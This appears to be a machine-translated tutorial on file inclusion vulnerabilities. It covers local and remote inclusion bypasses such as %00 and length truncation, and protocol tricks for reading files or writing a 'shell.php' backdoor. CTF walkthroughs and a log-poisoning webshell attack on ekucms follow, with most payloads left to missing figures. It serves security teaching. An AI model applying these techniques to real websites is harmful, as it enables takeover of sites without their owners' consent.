Table of contents
2. The file contains loopholes
3. Exploitation of local file inclusion vulnerabilities
<unlimited local file inclusion>
<limited local file inclusion>
4. Exploitation of Remote File Inclusion Vulnerabilities
<unlimited remote file inclusion>
<limited remote file inclusion>
<Write a sentence backdoor Trojan horse>
7. Examples of iSpring and Autumn Baidu Cup
8. A CMS file contains a vulnerability instance
1. Map
2. The file contains loopholes
1. Script code
The file contains individual script codes.
ASP,ASPX,JSP,PHP等
<!-—#include file="1.asp " -->
<!--#include file="top.aspx"-->
<c:import url="http://lthief.one/1.jsp">
<jsp:include page="head .jsp" / >
<%@ include file="head.jsp" %>
<?php Include ( 'test.php ' ) ?>2. Principle demonstration
(1) Create a php file named include.php, the code in the file is shown in the figure below.
(2) Create a file named 1.txt, the contents of which are shown in the figure below.
(3) Directly access the include.php file, and add the parameter value of filename to 1.txt. You can see that the website has successfully executed the php code in the file 1.txt.
(4) But if we directly access the 1.txt file, the website will only input it as a string of text. And when we use the file inclusion vulnerability to access, the website will execute it as code.
Summary: Execute the content in the specified file as website script code. For example: if the website is php, it will be executed as php code; if the website is jsp, it will be executed as jsp code;
3. Vulnerability causes
(1) Empty variable: $filename.
(2) Vulnerable function: include().
4. Detection method
(1) White box detection: code audit.
(2) Black box detection: Use vulnerability scanning tools, or search for public vulnerabilities, or check the parameters behind the URL to see if the file is received.
5. Type classification
(1) Local inclusion: Only local files are included.
(2) Remote inclusion: Including files that can be accessed from the Internet is more harmful.
(3) Unrestricted and restricted: Both types of inclusions have two situations: unlimited and restricted. Unrestricted means that there is no restriction and can be used directly. Restricted means that there may be some interference, and you need to use some special method to bypass.
3. Exploitation of local file inclusion vulnerabilities
<unlimited local file inclusion>
1. When we want to include files across directories, we need to use the " ../ " symbol to jump to the next level.
2. For example, we want to include www.txt under the path in the figure below.
3. We need to set the value of the parameter to the style shown in the figure below.
<limited local file inclusion>
1. The code here has more ".html" than the unlimited code above.
2. When we include the 1.txt file at this time, it is equivalent to including 1.txt.html.
3. So what should we do in the face of this situation? Here are several bypass methods.
4. The first method: %00 truncation : This method requires php version <5.3.4.
Just add "%00" at the end of the file to truncate the following ".html".
You can see that the code in the file is successfully executed after %00 truncation in the figure below.
5. The second type: length truncation : windows, the dot number needs to be longer than 250; linux, the dot number needs to be longer than 4096.
This method is similar to the method of filling garbage data in the process of waf bypassing.
Fill with junk data to reach the maximum length of the corresponding server system file name, thereby squeezing out ".html" and making it impossible to add.
Just add something like "/./././././././.·····", "...........·····" etc. at the end of the file Garbage data to squeeze out the following ".html".
You can see that the code in the file is successfully executed after length truncation in the figure below.
4. Exploitation of Remote File Inclusion Vulnerabilities
If there is a restriction in the code that only local files can be included, it will not cause remote file inclusion vulnerabilities.
If there are no restrictions in the code, and there is no setting in the settings on the platform that does not allow remote files to be included, it may cause remote file inclusion vulnerabilities.
There is such a switch in php - allow_url_include. It can be viewed through phpinfo().
If this switch is on, remote requests for addresses are allowed.
<unlimited remote file inclusion>
1. First demonstrate unlimited remote file inclusion.
2. Access the url shown in the figure below, and you can see that this file contains such a string of content.
3. Access the remote file, and you can see that the website has executed the content in the remote file.
4. We modify the code in the remote file to a backdoor code.
5. Visit again, you can see that the previous "ni shi gej ib!" has been successfully executed, but the backdoor code cannot be seen. This is a normal phenomenon. At this time, the backdoor code has actually been executed. Execute The effect is just blank.
6. Use the tool "chopper" to connect the backdoor code.
7. After opening the tool, enter the address and password and modify the script type to php, then click Add.
8. You can see that the backdoor file has been successfully connected.
<limited remote file inclusion>
1. The code here has more ".html" than the unlimited code above.
2. When we include the remote file at this time, it fails.
3. So what should we do in the face of this situation? Here are several bypass methods.
4. The first type: add %20 at the end :
5. The second type: add %23 at the end :
6. The third type: add at the end? :
5. How to play the agreement
Excellent article: https://www.cnblogs.com/endust/p/11804767.html
<read file content>
1. Enter the following content after the parameters to read the 1.txt file.
2. The read content is encrypted by base64 (to prevent garbled characters), and the original content of the file can be obtained after decryption.
<execute code>
1. Enter the following content after the parameter, and write the code to be executed in the post section.
<Write a sentence backdoor Trojan horse>
1. Enter the following content after the parameter, and write the code to be executed in the post section.
2. Check the website directory, you can see that the "shell.php" backdoor code has been successfully written.
6. Examples of Nanyou Cup CTF
address:asdf
1. Open the website.
2. Click on the description text.
3. First judge that there may be a file inclusion vulnerability, because the last parameter part is "file=show.php", which is obviously a file parameter with a high probability.
4. Because the show.php file is displayed here, we thought of accessing the show.php file directly. We can see that when we directly access show.php, the website returns the same content.
5. Therefore, we can judge that the content of show.php is text123. Putting it after the parameter is nothing more than including it and then executing the output. It is not difficult for us to judge here that the file contains a loophole .
6. Let's judge its operating system first, change php to phP and then visit, you can see that the web page returns an error, so we judge that it is a linux operating system .
7. Therefore, we execute the ls command under linux here, and we can see that the webpage returns the following content.
8. We execute another command, and the webpage still returns the same content, which means that the website has blocked this.
9. This method is not feasible, so we thought of the gameplay of the protocol, thought of the following method, first tried to read index.php, and found that the reading was successful.
10. Decode the read content.
11. Put the decoded file into a text file for viewing, because the viewing format in the above software is not very clear.
12. Successfully obtained the flag value.
7. Examples of iSpring and Autumn Baidu Cup
1. Open the shooting range to see the following content.
2. Read the code given in the page to know its meaning: if the path variable is received, use include to include the received value, otherwise execute the following phpinfo.php.
3. Verify that there is no problem with our analysis.
4. We first include the index.php file, and we can see that it has been read successfully.
5. Judging its operating system --> linux system.
6. Use linux commands to read the directory.
7. Since we have already read the last two files, let's read the first file to see its contents.
8. Found that nothing was read.
9. View the source code of the web page, you can see that the flag is here.
8. A CMS file contains a vulnerability instance
1. Open the website and you can see the following page.
2. So how did we discover the vulnerability of this website?
3. First of all, we know that it is ekucms, so we can directly search for the vulnerability of this cms on the Internet. If there is, we will use it directly. If not, we will download the original code and analyze it ourselves.
4. It can be seen that there are indeed loopholes.
5. Find an article, and you can know its idea is: Because there is no file upload in this cms, it can only access the inherent files in the website. But because this cms has a local file inclusion vulnerability, we can write a one-word Trojan horse into the log of the website, then use the local file inclusion vulnerability to include this log file, and then use tools such as a kitchen knife to connect.
6. Copy the url in the article, and then put it in our browser to modify it for access.
7. It can be seen that the web page returns an error message, but at this time the url content has been written into the log of the website.
Explanation: Why don't you need to add "<?php?>" on both sides of the backdoor code, because when the file is included, the content in the file will be executed according to the script type of the website, and the script type of the website here is php , so without adding "<?php?>", it will also be executed according to the php code.
8. The log is named by time and date, first visit the following url to trigger the backdoor code.
8. Add parameters to test, and you can see that the parameter code is successfully executed.
9. At this point, we can basically execute arbitrary code, and we have successfully obtained the authority of the website.